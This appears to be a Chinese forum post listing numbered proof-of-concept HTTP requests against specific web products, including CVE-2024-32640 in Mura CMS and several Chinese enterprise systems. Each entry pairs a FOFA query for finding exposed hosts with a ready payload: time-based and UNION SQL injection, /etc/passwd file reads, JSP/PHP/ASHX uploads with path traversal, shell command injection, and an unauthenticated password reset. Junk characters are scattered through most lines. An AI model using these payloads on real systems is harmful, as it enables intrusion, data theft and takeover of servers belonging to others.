) v+ N3 n1 }6 yHost: your-ip1 }$ s" A. k( W% `2 c8 y3 `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
, d& }$ j/ j- z; ^! q/ P nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 @5 f ~( o E5 V- a
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 B: y6 x& Y; I/ D3 Z
Accept-Encoding: gzip, deflate
: t9 T' ]: i w6 _6 dConnection: close
9 K1 [6 e" {' w& G" Q" c$ w8 f, KContent-Type: application/x-www-form-urlencoded
6 M* `. A2 Y0 G6 ~! r- c
) X- E+ w9 u+ z/ Ureq_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450
- C& ~& s$ h6 ^7 T% t( F O9 a0 h. l; Z$ T
/ h0 i |; H- X, N8 |187. Mura CMS processAsyncObject SQL注入1 `/ H5 g# t. e4 p6 f2 r
CVE-2024-32640& U, E5 H, o% z' I8 _) c( k
FOFA:"Mura CMS"8 G- d8 I7 i+ i. m3 s
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
# I9 Q. C" |8 V+ q3 qHost: your-ip
; r4 q! E, p0 V$ z2 TContent-Type: application/x-www-form-urlencoded: V! }: r; _9 \& B4 B3 W" ?5 z% _& f' P
3 [( L" V6 v n$ v
9 }5 r4 M" o N4 X/ d6 i$ _
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1; x( X8 {5 Q$ T! z5 P5 h
: q! e. u* j c" V, i' Y' ?; u
188. 叁体-佳会视频会议 attachment 任意文件读取 a8 D# g6 r/ z- k: B# ^3 D
version <= 3.9.7" k0 @. J1 ~0 |, K; h
FOFA:body="/system/get_rtc_user_defined_info?site_id"- }$ U) N/ A# g* |6 r# O
GET /attachment?file=/etc/passwd HTTP/1.1
( d3 [0 @& Y! w9 C! @8 E1 A! {Host: your-ip
' V2 H6 P+ [$ PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
# M; c- T5 E6 l+ l; t" e2 y+ y' C EAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.77 l9 ?( |. ^2 ?9 U$ T
Accept-Encoding: gzip, deflate
0 Q g' F6 J! kAccept-Language: zh-CN,zh;q=0.9,en;q=0.8& \+ `3 S4 C, [, i
Connection: close0 A* K- j) p3 `6 e( J8 \. }0 v
. o# t( @" ]7 c' n) B! [. `
% G9 p+ f2 }9 p- h# w
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
7 P7 n0 R+ |9 l4 h' @; M- w' J6 n# gFOFA:app="LANWON-临床浏览系统"4 F, I0 r( J4 G, a5 @( ?- r
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.19 i2 B( j" M; Z: w! q
Host: your-ip+ ]& G: |! w8 c7 `! L- r2 e! r
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36: v+ N' f* M, N2 D7 @, `/ m, n5 ^( a
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
3 | y& n* p& w9 N4 z ?. uAccept-Encoding: gzip, deflate
% l) o# F* i; p wAccept-Language: zh-CN,zh;q=0.9$ P; h& ]5 U8 y. W# U3 q4 {
Connection: close
/ e5 _3 K5 m& z( \% {2 G5 I; E5 n4 Y7 A' t4 w, ^. }* W( n
- h6 X4 d' k2 i7 {5 K2 x
190. 短视频矩阵营销系统 poihuoqu 任意文件读取8 U& ~# A" c( x# t6 o- F2 y4 ?
FOFA:title=="短视频矩阵营销系统"1 r3 v2 X% m) |$ C2 e
POST /index.php/admin/Userinfo/poihuoqu HTTP/23 X: e' C4 u/ O' }8 ^ \ N
Host: your-ip
- a; H$ f z+ G1 G1 ~7 L, JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36! C& f; q: d7 G( \! w
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9. W. m* q2 `, }" U: g
Content-Type: application/x-www-form-urlencoded
# l4 }( D1 A" W6 c2 P' r3 f2 W' YAccept-Encoding: gzip, deflate1 n' |' j6 L/ e0 I' k9 ^$ Q
Accept-Language: zh-CN,zh;q=0.9! d B2 X1 D0 ]
* @7 b3 L, w! t0 t6 p( Z# R1 A
poi=file:///etc/passwd3 v G; J- t+ F) K+ e
* k/ V* }) ? o% }
& A; V1 `2 ?) b$ l! c* j! ^191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入. V8 M' r6 I* g3 x) Q+ {8 l. g
FOFA:body="/CDGServer3/index.jsp", o @0 W, C! e7 ~+ Z$ D
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
' g: A! J6 U. ?- W3 L" fHost: your-ip0 ^3 x! P8 A( `+ J9 A4 Z" _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.368 b2 p+ `5 d! Q X
Content-Type: application/x-www-form-urlencoded
: @! ]- x' v5 F2 Y9 c& Q/ ]
3 Y# B7 z7 L# d' Hcommand=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=+ S2 c% q. N$ _1 M! L# ]
# f" V- y+ l. h! b& g5 l$ v1 P
$ J1 y- I# l& o4 F$ I1 a: T192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
# C1 E; P6 F! d' J0 @: u" MFOFA:title="用户登录_富通天下外贸ERP"9 d" E8 J; W1 |
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
' r3 u# |) Y" b% FHost: your-ip
, v9 N* }6 k9 N \. q4 TUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
% D: q: t2 `, G5 p+ o, xContent-Type: application/x-www-form-urlencoded3 {0 {6 d7 G* e* f; z9 k
5 n9 W2 D& E. J8 j
$ k: d7 ~+ ?+ c& ^9 d/ ?, G9 U<% @ webhandler language="C#" class="AverageHandler" %># l) d7 w3 ?6 ?1 P v
using System;5 f1 D/ |; \/ B
using System.Web;$ {- T2 j# k2 {6 P# x6 [
public class AverageHandler : IHttpHandler
. D9 l" t# d) u; f1 X' R1 G{
, ?. J' d0 G4 _+ `# s- ~public bool IsReusable
+ C7 ^" T6 ]1 j4 W- i{ get { return true; } }- i% \" {$ |! r2 `
public void ProcessRequest(HttpContext ctx)$ l# s8 P& C! v
{
$ v0 R+ U, V4 k8 L# ^ctx.Response.Write("test");4 s$ Y9 [# K2 ^* O c. S
}
( f3 O- b% l' _2 X; f K}/ g6 u" Z. r4 v& _+ \( O
- b, ~, s% W2 N) A5 { V
. t; n4 F. M8 [4 R( Z& X193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行 Q+ m7 D a" N% D3 g/ C
FOFA:body="山石云鉴主机安全管理系统"
s2 R" f3 I3 K/ S, p5 }GET /master/ajaxActions/getTokenAction.php HTTP/1.1
f. I4 `% R+ h5 ^' ^( a* [3 nHost:& B. T7 A ?. d' B6 H! i* Y k4 K( R
Cookie: PHPSESSID=2333333333333;: r5 G! ^ e) r _
Content-Type: application/x-www-form-urlencoded
* r" M: M9 a7 [5 l( ? }/ HUser-Agent: Mozilla/5.0/ p9 w- D/ w3 R# ^9 c- ]
8 a8 B9 d# K2 {0 s" g3 S {
% s! E' _, [. h. x, E0 s/ j# H% FPOST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1% k+ }# q2 N# w; S6 a* w2 H
Host:9 X5 q) R* x- ?! d
User-Agent: Mozilla/5.0# I) s8 \* J) T& F* Q
Accept-Encoding: gzip, deflate1 y4 T) L9 u1 E$ v; d' b& @( T+ T! |0 X# g
Accept: */*
9 q' K! ^6 c7 O3 I4 W1 S7 RConnection: close
. s7 t) P4 L8 A% [Cookie: PHPSESSID=2333333333333;. y; m( e; f& T) K9 o: r% y
Content-Type: application/x-www-form-urlencoded
' u! L, o9 Q& ^, L9 uContent-Length: 84( q5 X9 X: N: w+ ~! h4 ]' r
{' X) ?' p6 j7 i9 I
param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')
( h2 r7 b" e, M
) B- s, n. @+ N9 w5 i- X0 r9 w3 Q+ P8 \+ d. V( F
GET /master/img/config HTTP/1.1- {1 [8 o/ Q" T) T6 @
Host:( m# a( ^ T$ Y* s* l+ L
User-Agent: Mozilla/5.0
+ w0 X5 Q7 t! \7 E9 @ W& {4 {& v. @
a8 ]5 H9 u9 ?) Q! B
( @% k7 `! G( S; D8 \" ]194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
" d& u1 P e- C5 Q& _* [6 yFOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在9 J% O0 e! H5 {% t( H3 h
$ ^$ k. R5 x3 z8 Z' M6 @3 ?$ YPOST /servlet/uploadAttachmentServlet HTTP/1.1
5 U0 ^( p* p& D) bHost: host0 R Q0 P3 z, }5 {3 y* D- O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
8 s1 A6 b' z/ Q2 QAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
7 e& i# J" H. Q/ R8 }9 g: d$ tAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.23 }" A7 }! s; u! @0 `5 ?
Accept-Encoding: gzip, deflate
8 f _: g" V" _. k- U }" a" g0 jConnection: close
: k0 w5 s J& G6 s9 ~4 | J: S2 Y tContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk
" v$ [4 ?" E4 h% ~------WebKitFormBoundaryKNt0t4vBe8cX9rZk
( H; h; l V4 u; j A5 j% J! }$ K8 @2 V; s
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
: u! X7 r- k cContent-Type: text/plain) ]* T: X/ p$ Y% L& B
<% out.println("hello");%>) S- v# C7 B, i! M; d2 ?
------WebKitFormBoundaryKNt0t4vBe8cX9rZk& X) O. n6 W7 s0 x; [: a) T
Content-Disposition: form-data; name="json") K; K/ U' }5 b0 X7 R) W
{"iq":{"query":{"UpdateType":"mail"}}}
! j% q' Q3 n. s8 q: S8 b------WebKitFormBoundaryKNt0t4vBe8cX9rZk--
( C X- K# f) q7 K& |
( m4 {9 i3 |8 R8 J5 T( t: c- X1 X4 \, c
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行' u2 b1 w7 r6 W5 p/ |$ M/ {- K
FOFA:title=="飞鱼星企业级智能上网行为管理系统, J% T) L" J8 R/ i# `
POST /send_order.cgi?parameter=operation HTTP/1.16 V* e* }3 {# O, H
Host: 127.0.0.10 a5 E0 @3 W2 g! x
Pragma: no-cache$ | E/ D# J' f) v, y
Cache-Control: no-cache
1 z% s4 R9 ~* u( p. C, I- IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.361 C) s$ ?, ^ [5 B, ~' t% l4 a
Accept: */*4 ~0 p8 o7 g. k l: ]
Accept-Encoding: gzip, deflate% Q* Q) q/ Z' N
Accept-Language: zh-CN,zh;q=0.9- W$ r1 K/ ?' b* E% }( J. U( t7 ~
Connection: close3 H+ i8 }# b3 |! H# I- }# e
Content-Type: application/x-www-form-urlencoded
; _+ i" r! V* @! pContent-Length: 68
4 S7 j7 j4 V3 D# X5 Z8 u; k N' c9 s: W' h$ W. u- a/ E. x
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
6 O4 P0 X/ m( ]7 D3 i
$ o8 E( r( z8 L+ M1 s" j) M) i: R
+ q. q( \3 q" t2 w196. 河南省风速科技统一认证平台密码重置
: L: R+ n& k8 ZFOFA:body="/cas/themes/zbvc/js/jquery.min.js"
! O0 y% i. \8 d8 G' S9 VPOST /cas/userCtl/resetPasswordBySuper HTTP/1.1! w$ @( I8 `. P
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
; Q7 v/ R& h, C( V. \$ rContent-Type: application/json;charset=UTF-8
b# M+ B( X! r6 r/ ^" q; fX-Requested-With: XMLHttpRequest
8 O% \2 G6 n5 @* ZHost:
( Z2 Q1 Y0 p4 j* u$ ^$ b+ lAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
( @3 o% e5 Z Y( `* N7 wContent-Length: 45
+ y, I+ |( r9 s4 ]; d( V" ]0 vConnection: close
$ ]9 Q3 I/ O5 v1 E3 D( R3 y4 R4 f4 e
{"xgh":"test","newPass":"test666","email":""}$ x; O7 N# _1 J4 w$ E! ]' l
/ u2 L6 W3 N) o5 Q
3 U" n* a9 H8 Z. n5 F3 z' L8 Q' q! y: k6 d
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
' w( X$ i; i4 m0 S$ }$ U3 M. y3 zFOFA:app="浙大恩特客户资源管理系统"
6 t7 e" J( X, gGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.15 {1 w2 J% w I9 B* @
Host:5 @- w" j9 m1 n' i0 `' M% S4 ^
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36, @& f, j: s# Z- [; A5 k
Accept-Encoding: gzip, deflate
0 A8 Q$ v* S9 Q& _9 X( ?; gConnection: close" Z! f8 u* M8 R; t! [# J
2 E# O( d' A: n6 K
2 e) Y! w& E% K$ h& w
# c0 r! h5 J; |5 Z! J/ K( v
198. 阿里云盘 WebDAV 命令注入7 j. i( l& K- |, ?
CVE-2024-29640
. f/ N/ `9 I7 yGET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
- M# t9 F' R1 ]' U2 Q% cCookie: sysauth=41273cb2cffef0bb5d0653592624cf64# u! Z; s9 y7 r1 ?
Accept: */*3 j9 x% U3 B# [ b8 b3 {
Accept-Encoding: gzip, deflate O5 \& c- x' h4 y# x0 [3 u V
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
! N) A4 g% c' p7 f: pConnection: close
7 @+ Y+ v# U7 Y1 o0 {4 B s" w2 t# b
# B8 j5 G; B0 I: `: ?. T2 D
199. cockpit系统assetsmanager_upload接口 文件上传# s' Y5 B& k+ }! U3 h
' |; j" {% T1 Y3 P4 w; Y; l$ _1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
6 V4 |0 `! _& J' e+ _- xGET /auth/login?to=/ HTTP/1.1" @3 k" z/ h; H" C" I, V9 {7 ~
: A8 K1 O& e4 k- j. P" d z$ g
响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw") L& c& ?2 K, _ n
9 \' y( z, ?# J5 l" r2.使用刚才上一步获取到的jwt获取cookie:
a# X9 u1 Q% d8 c% s% q, x6 m' i1 V
POST /auth/check HTTP/1.1- h3 \- [) D/ L0 y0 _1 q: O' R
Content-Type: application/json
0 {6 O" H9 D8 k1 x
, l0 B4 }. E; @- s5 d. R6 S{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}6 I8 [4 u( C1 {- M5 m3 h4 {8 t" _* a
5 T' w' l, W. K3 z3 X
响应:200,返回值:
3 F0 C& l( q- R7 U' w( ?" j! ^" vSet-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
% N; V" E0 r# ]2 l' SFofa:title="Authenticate Please!". f! \' u# l) {* v6 i+ d: L2 r
POST /assetsmanager/upload HTTP/1.10 W H7 J0 G8 h8 h* J$ k
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3# T6 d) t: J. P! U0 j+ _( d3 P" T
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92
$ T7 _: |6 y% N- X1 C4 Y
: ?2 A/ |- G. i" J* Q7 t- n-----------------------------36D28FBc36bd6feE7Fb3
' B4 s( @ C- A& DContent-Disposition: form-data; name="files[]"; filename="tttt.php"- h9 I* B8 a' n3 w. R0 W
Content-Type: text/php
3 C" `' e+ c% a8 t" b' X. ~
9 |! r. m( C+ N! D I, n<?php echo "tttt";unlink(__FILE__);?>
' C: C% L% r% Z2 H-----------------------------36D28FBc36bd6feE7Fb37 y1 a% f* c1 \# }. |. S8 `& |0 C
Content-Disposition: form-data; name="folder"* {, V- t+ o8 E+ F
, q) G8 c( F3 V- M4 @+ ]- |
-----------------------------36D28FBc36bd6feE7Fb3--
' |; V/ J, M& T2 ^# i4 T. L# l) t- @! l* W$ g# n- d) ]/ Y1 P* E
: M# u8 Q- |' h8 j' p5 h/storage/uploads/tttt.php
% t* z3 T4 v) P% C" @" m) A1 {( K4 w8 G- Y8 v/ F
200. SeaCMS海洋影视管理系统dmku SQL注入
/ Y6 Y3 X' {- r( r7 }4 kFOFA:app="海洋CMS"9 e' x& {: f9 I
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
: M8 ^* `# k U% D! R, i& Z% |8 RCookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
1 {4 d. i% O" gUpgrade-Insecure-Requests: 1
, G/ C# Z2 Y" D2 j* KCache-Control: max-age=0
- L G; @( S6 w$ PAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
0 Z# B' g5 @5 p# k' U' V# _ MAccept-Encoding: gzip, deflate
% e5 G4 D3 j. i: x. `2 }Accept-Language: zh-CN,zh;q=0.9
$ l+ {: t2 z8 r" j
. A3 r6 p& I% y) y% ` [$ \, V1 @
201. 方正全媒体新闻采编系统 binary SQL注入
" p O5 `: H9 y, EFOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
) D) s+ n3 O3 s4 ^4 XPOST /newsedit/newsplan/task/binary.do HTTP/1.17 E# o3 @3 |% I& ~
Content-Type: application/x-www-form-urlencoded
4 |' X* b8 S: b* SAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+ y) D1 `. l, ]# ^Accept-Encoding: gzip, deflate2 }$ r: M$ R# S4 I
Accept-Language: zh-CN,zh;q=0.9
+ C" X% E& \# ^0 N! J" v" i$ wConnection: close
; b* L8 }9 X2 D; a2 w0 P: I( y' a& t+ ], Z! e+ U$ a5 C
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
% b8 D) I9 Q! A" @( L
/ R' L# E, ~ l/ Z; b$ G% o0 g. l" j; ]8 }5 I b. P
202. 微擎系统 AccountEdit任意文件上传" H0 X2 Y9 K( O) l1 K4 ?
FOFA:body="/Widgets/WidgetCollection/"9 F6 `, n# V( b$ K! @0 O+ @
获取__VIEWSTATE和__EVENTVALIDATION值
: ^* T# R4 t/ i* [; gGET /User/AccountEdit.aspx HTTP/1.1
" q1 r% U& l- y9 q3 s" NHost: 滑板人之家# Z7 ]& _8 @- x5 a h! M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31+ I! U, `' @/ G2 g: F2 y
Content-Length: 0% u+ V' B: |7 _2 X# j6 o
) V& n$ q$ n% Q
; b. |: n) c; a& T2 l" }替换__VIEWSTATE和__EVENTVALIDATION值
) V# P7 a+ o, \+ tPOST /User/AccountEdit.aspx HTTP/1.1 y* t) T9 w1 v3 H, T) N* Y
Accept-Encoding: gzip, deflate, br
& i) I! _' l8 y+ ~* KContent-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687* v% z+ K7 |8 n: {
- f0 m1 ]5 E" z6 a; g' @. @4 ?
-----------------------------786435874t38587593865736587346567358735687
7 f. g( F4 P- i, _- c$ ZContent-Disposition: form-data; name="__VIEWSTATE"
: h# G; h* i2 Y! O0 z$ h- l! \; N9 I A
__VIEWSTATE
6 b" h4 u6 k& [. a-----------------------------786435874t38587593865736587346567358735687& E* m9 C/ t/ K+ O) h4 d
Content-Disposition: form-data; name="__EVENTVALIDATION"
0 o. Q, d* [ @& o7 J3 A8 i2 _: L5 a4 e4 @
__EVENTVALIDATION
7 {5 z8 V* B# h* @2 B( ]0 ^-----------------------------786435874t38587593865736587346567358735687
5 V. ^/ B+ f* ~+ u$ F" J8 RContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
( r4 ^& @+ @* o' \8 |Content-Type: text/plain, x6 d3 R) J; \+ {. Z' J; D d" U/ R
! Y- [! x8 i6 n( q
Hello World!. p/ F5 w* z# W# h$ G" b& M* H
-----------------------------786435874t38587593865736587346567358735687
, H* }& L2 _ Y" _Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"; i: j* N- m8 @4 r
* C$ x F3 }- C
上传图片
, n9 e4 [9 H# G8 K! p% b5 e-----------------------------786435874t385875938657365873465673587356878 S5 b/ K" a s
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"( d1 D2 v# w, G8 e& ~
$ _; X9 f/ @; N, C; X7 p
- X, L: \4 c R: o' r
-----------------------------786435874t38587593865736587346567358735687
1 s/ ^" v9 D; v$ w+ ^; u3 U+ vContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"# N- F. @; q4 y1 ~/ X+ m: t
" J" E& D/ @$ y3 v
7 Q! s" h; n, n' q-----------------------------786435874t38587593865736587346567358735687--% N$ k" v- I8 u
9 w n" K! Y' z" F) A( B" O* c
9 r: C/ ?) W1 J) F/_data/Uploads/1123.txt
! T5 f8 {% f1 O' o# c- I' p$ @
6 m8 M X+ J/ k- d203. 红海云EHR PtFjk 文件上传: W/ N" ]% [+ T& q
FOFA:body="RedseaPlatform"
, v4 W. ~& C+ R+ ^$ KPOST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
8 G# {' u; B/ s! DHost: x.x.x.x& Z, m9 h- i1 k- M6 }
Accept-Encoding: gzip
5 c! y8 J) g# u, `7 h, DUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
, a. y) l d& E/ @0 M Q9 t2 S+ j3 E: HContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
9 m/ Z0 v/ u6 X: JContent-Length: 210' }+ n: H6 L/ d
5 N x5 ]8 M7 M" U$ X C, a+ {------WebKitFormBoundaryt7WbDl1tXogoZys4
' Z+ q0 d& u- O& ]$ v- ?Content-Disposition: form-data; name="fj_file"; filename="11.jsp": p7 R( F% p7 {8 M ?
Content-Type:image/jpeg
' _ X( q9 ]/ u; \7 @) Z2 K" i5 |! Z, ?2 _) D
<% out.print("hello,eHR");%>2 b0 z3 B0 u6 \" r. T$ j! I3 Z
------WebKitFormBoundaryt7WbDl1tXogoZys4--* c: H6 ?3 w6 V) S! I5 l
" f# }% I6 i! h/ A5 R
5 U, P9 W& g5 d+ k" V
" M: [7 U% _2 I
/ j7 S/ l- d9 {- T) v( H* m
2 X9 F. _4 Z3 i
5 Z8 |2 ?7 O& J4 b7 }. n" p |
发表于 2024-6-5 14:31:29
收藏
支持
反对